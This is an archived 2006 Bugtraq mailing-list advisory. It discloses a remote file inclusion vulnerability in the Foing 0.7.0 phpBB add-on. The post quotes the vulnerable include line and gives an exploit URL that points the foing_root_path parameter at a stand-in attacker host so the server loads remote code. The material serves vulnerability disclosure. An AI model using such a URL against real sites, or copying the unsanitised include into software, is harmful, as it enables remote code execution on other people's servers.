| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060612124308.3205.qmail@securityfocus.com> Date: 12 Jun 2006 12:43:08 -0000 From: darkfire@...elive.zzn.com To: bugtraq@...urityfocus.com Subject: Foing (manage_songs.php) Remote File Inclusion[phpBB] # Foing (manage_songs.php) Remote File Inclusion[phpBB] # # Contact : email: darkfire@...elive.zzn.com & msn: darkfire@...kfire-br.com # Risk : High # Class : Remote # Script : Foing # Version : 0.7.0 e previous --------------------------------------------------------------------- Vulnerable code : include($foing_root_path . 'includes/common.php'); --------------------------------------------------------------------- http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker by Darkfire and IR4DEX GROUP Greetz: Smurf_RedHat :: V0lks
Powered by blists - more mailing lists